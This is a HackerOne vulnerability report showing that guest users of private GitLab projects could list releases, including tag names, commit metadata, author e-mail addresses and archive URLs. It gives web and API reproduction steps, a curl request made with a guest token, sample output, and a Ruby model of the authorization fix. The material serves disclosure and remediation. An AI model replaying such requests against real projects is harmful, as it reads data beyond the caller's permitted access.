Guest users of private projects have access to releases
HackerOne report #478082 by xanbanx on 2019-01-11, assigned to asaba
GitLab recently introduced Releases, a way to present tags in the GitLab user interface. These releases are currently managed via the API. Releases are closely tied to ordinary git tags and therefore present similar information. However, guest users, who do not have access to the code, also have access to these releases, and therefore to the code-related information they carry.
Steps to reproduce
Tested on GitLab 11.7.0-rc4-ee
- Create a private project, push some code, create a git tag, and create a new release via the API. (In these steps the project is accessible via the namespace joe/test-releases)
- Add a guest user to the project
- As the guest user, open the following page: https://gitlab.com/joe/test-releases/releases
Here, you can observe that the sidebar does not show the releases page. However, you can still access this page and retrieve the list of releases.
Similarly, as a guest user you can also retrieve the releases via the API. To do so, perform the following API call:
# Releases endpoint of the Releases API (GET /projects/:id/releases), called with a guest user's token
curl --request GET --header "PRIVATE-TOKEN: <GUEST-USER-TOKEN>" https://example.gitlab.com/api/v4/projects/<project-id>/releases
This will return all releases, including information like the tag, description, commit details, etc., as shown below in the JSON output.
[
  {
    "tag_name": "secret-tag",
    "description": "This is a secret security release mitigating vulnerabilities",
    "name": "Secret Release",
    "description_html": "<p dir=\"auto\">This is a secret security release mitigating vulnerabilities</p>",
    "created_at": "2019-01-11T12:30:06.503Z",
    "author": {
      "id": 1,
      "name": "joe",
      "username": "joe",
      "state": "active",
      "avatar_url": "https://secure.gravatar.com/avatar/6466f73ed21b9d1624dee906821e9176?s=80&d=identicon",
      "web_url": "https://example.gitlab.com/joe"
    },
    "commit": {
      "id": "9acaed88330c5fcb7cd119e7b10af49d3a9a48ab",
      "short_id": "9acaed88",
      "title": "Add new file",
      "created_at": "2019-01-11T12:25:04.000Z",
      "parent_ids": [],
      "message": "Add new file",
      "author_name": "joe",
      "author_email": "test@bar.com",
      "authored_date": "2019-01-11T12:25:04.000Z",
      "committer_name": "joe",
      "committer_email": "test@bar.com",
      "committed_date": "2019-01-11T12:25:04.000Z"
    },
    "assets": {
      "count": 4,
      "sources": [
        {
          "format": "zip",
          "url": "https://example.gitlab.com/joe/test-releases/-/archive/secret-tag/test-releases-secret-tag.zip"
        },
        {
          "format": "tar.gz",
          "url": "https://example.gitlab.com/joe/test-releases/-/archive/secret-tag/test-releases-secret-tag.tar.gz"
        },
        {
          "format": "tar.bz2",
          "url": "https://example.gitlab.com/joe/test-releases/-/archive/secret-tag/test-releases-secret-tag.tar.bz2"
        },
        {
          "format": "tar",
          "url": "https://example.gitlab.com/joe/test-releases/-/archive/secret-tag/test-releases-secret-tag.tar"
        }
      ],
      "links": []
    }
  }
]
Similarly, the single-release endpoint https://example.gitlab.com/api/v4/projects/<project-id>/releases/:tag_name is affected by the same issue.
Steps to mitigate
Perform proper authorization checks in the API and for the releases page. Guests should not have access to this information.
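The mitigation above amounts to one rule: because a release exposes what its git tag exposes, reading a release must require the same permission as reading the repository. The following Ruby snippet is an added example that models that rule; it is not GitLab's own policy code (GitLab's DeclarativePolicy classes are far more elaborate), and the names ReleasePolicy, can_download_code?, can_read_release? and api_status are assumptions made for the illustration. It puts the vulnerable decision ("any member may read releases") beside the corrected one ("read_release follows download_code") and shows which HTTP status a guest on a private project should now receive.

```ruby
# Added example modelling the authorization fix; not GitLab's code.
# Assumption: a release discloses the same data as its git tag, so reading a
# release requires the permission that reading the repository requires.

# Membership access levels, with the numeric values GitLab assigns to them.
GUEST     = 10
REPORTER  = 20
DEVELOPER = 30

module ReleasePolicy
  module_function

  # Who may read repository code (download_code):
  #  - public projects: anyone
  #  - internal projects: any logged-in user
  #  - private projects: members with at least Reporter access
  # access_level is nil for a caller who is not a project member.
  def can_download_code?(visibility, access_level, logged_in: true)
    case visibility
    when :public   then true
    when :internal then logged_in
    when :private  then !access_level.nil? && access_level >= REPORTER
    else false
    end
  end

  # The vulnerable rule described in the report: any project member,
  # guests included, could read releases of a private project.
  def can_read_release_before_fix?(visibility, access_level)
    visibility == :public || !access_level.nil?
  end

  # The corrected rule: read_release is tied to download_code, so a guest
  # who cannot read the code cannot read the releases either.
  def can_read_release?(visibility, access_level, logged_in: true)
    can_download_code?(visibility, access_level, logged_in: logged_in)
  end

  # Status an API endpoint should answer with (assumed convention):
  #  200 when the permission is granted,
  #  403 for a member who lacks the permission,
  #  404 for a caller who cannot see the project at all, so that the
  #      existence of a private project is not disclosed.
  def api_status(visibility, access_level, logged_in: true)
    return 200 if can_read_release?(visibility, access_level, logged_in: logged_in)
    access_level.nil? ? 404 : 403
  end
end

if $PROGRAM_NAME == __FILE__
  # Walk through the report's scenario: a guest on a private project.
  [[:private, GUEST], [:private, REPORTER], [:private, nil], [:public, nil]].each do |vis, lvl|
    before = ReleasePolicy.can_read_release_before_fix?(vis, lvl)
    after  = ReleasePolicy.api_status(vis, lvl)
    puts format("%-8s access=%-4s before_fix=%-5s after_fix_status=%d", vis, lvl.inspect, before, after)
  end
end
```

Running the file prints the before/after decision for each case; the line for a guest on a private project shows the release readable before the fix and a 403 afterwards, which is the regression a test suite for the fix should pin down.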
Impact
Guest users of a private project can read information their role does not permit them to see: release names and descriptions, the underlying tag name, commit metadata (ids, messages, author and committer e-mail addresses), and the URLs of the source archives for the tag.